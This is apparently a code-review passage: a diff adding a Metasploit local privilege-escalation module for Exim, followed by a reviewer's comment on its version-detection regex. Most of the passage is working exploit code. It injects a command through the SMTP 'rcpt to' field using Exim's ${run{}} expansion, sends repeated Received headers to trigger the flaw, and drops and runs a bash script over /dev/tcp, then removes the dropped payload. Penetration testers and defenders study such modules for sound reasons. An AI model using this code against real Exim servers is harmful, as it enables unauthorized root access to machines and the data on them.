modules/exploits/linux/local/exim4_deliver_message_priv_esc.rb

```diff
@@ -0,0 +1,214 @@
+      ])
+  end
+
+  def base_dir
+    datastore['WritableDir'].to_s
+  end
+
+  def encode_command(cmd)
+    '\x' + cmd.unpack('H2' * cmd.length).join('\x')
+  end
+
+  def inject_payload(payload)
+    if session.type == 'meterpreter'
+      socket_subsystem = Rex::Post::Meterpreter::Extensions::Stdapi::Net::Socket.new(client)
+      params = Rex::Socket::Parameters.new({
+        'PeerHost' => '127.0.0.1',
+        'PeerPort' => datastore['EXIMPORT']
+      })
+      begin
+        socket = socket_subsystem.create_tcp_client_channel(params)
+      rescue => e
+        print_error("Couldn't connect to port #{datastore['EXIMPORT']}, "\
+                    "are you sure exim is listening on this port? (see EXIMPORT)")
+        raise e
+      end
+      socket.gets
+      socket.puts("helo localhost\n")
+      socket.gets
+      socket.puts("mail from:<>\n")
+      socket.gets
+      socket.puts("rcpt to:<${run{#{payload}}}@localhost>\n")
+      socket.gets
+      socket.puts("data\n")
+      socket.gets
+      for i in (1..31)
+        socket.puts("Received: #{i}\n")
+      end
+      socket.puts(".\n")
+      socket.gets
+      socket.puts("quit\n")
+      socket.close
+      socket_subsystem.shutdown
+    else
+      unless cmd_exec("/bin/bash -c \"exec 3<>/dev/tcp/localhost/#{datastore['EXIMPORT']}\"; echo $?").chomp.to_i == 0
+        fail_with(Failure::NotFound, "Port #{datastore['EXIMPORT']} is closed")
+      end
+
+      bash_script = %|
+        #!/bin/bash
+
+        exec 3<>/dev/tcp/localhost/#{datastore['EXIMPORT']}
+        read -u 3 && echo $REPLY
+        echo "helo localhost" >&3
+        read -u 3 && echo $REPLY
+        echo "mail from:<>" >&3
+        read -u 3 && echo $REPLY
+        echo 'rcpt to:<${run{#{payload}}}@localhost>' >&3
+        read -u 3 && echo $REPLY
+        echo "data" >&3
+        read -u 3 && echo $REPLY
+        for i in $(seq 1 30); do
+          echo 'Received: $i' >&3
+        done
+        echo "." >&3
+        read -u 3 && echo $REPLY
+        echo "quit" >&3
+        read -u 3 && echo $REPLY
+        exec 3<&-
+      |
+
+      @bash_script_path = File.join(base_dir, Rex::Text.rand_text_alpha(10))
+      write_file(@bash_script_path, bash_script)
+      register_file_for_cleanup(@bash_script_path)
+      chmod(@bash_script_path)
+      cmd_exec("/bin/bash -c \"#{@bash_script_path}\"")
+    end
+
+    print_status('Payload sent, wait a few seconds...')
+    Rex.sleep(5)
+  end
+
+  def on_new_session(session)
+    super
+
+    if session.type == 'meterpreter'
+      session.core.use('stdapi') unless session.ext.aliases.include?('stdapi')
+      session.fs.file.rm(@payload_path)
+    else
+      session.shell_command_token("rm -f #{@payload_path}")
+    end
+  end
+
+  def check
+    exim = datastore['EXIMPATH'] ? datastore['EXIMPATH'] : 'exim'
+
+    res = cmd_exec("#{exim} -bV")
+    if res =~ /Exim version ([0-9\.]*) /i # Maybe improve the regex
```

Comment:
On Ubuntu, the package version format may contain `_`.

```
Exim version 4.86_2 #2 built 10-Feb-2018 19:18:40
```

It's likely that other systems, or compiling from source, may also introduce additional characters, especially for pre-release builds.

Also, `*` implies zero or more, which is likely to cause issues with the following `Gem::Version.new($1)` if it it in fact zero.

Suggest something like this:

```suggestion
    if res =~ /Exim version ([0-9\.]+)/i
```

Note that trying to also extract the `_` is not advised, unless you want to perform some string substitution, as per:

```
# irb
irb(main):001:0> Gem::Version.new('4.86')
=> #<Gem::Version "4.86">
irb(main):002:0> Gem::Version.new('4.86_2')
Traceback (most recent call last):
        5: from /usr/bin/irb:11:in `<main>'
        4: from (irb):2
        3: from /usr/local/lib/site_ruby/2.5.0/rubygems/version.rb:203:in `new'
        2: from /usr/local/lib/site_ruby/2.5.0/rubygems/version.rb:203:in `new'
        1: from /usr/local/lib/site_ruby/2.5.0/rubygems/version.rb:212:in `initialize'
ArgumentError (Malformed version number string 4.86_2)
irb(main):003:0> 
```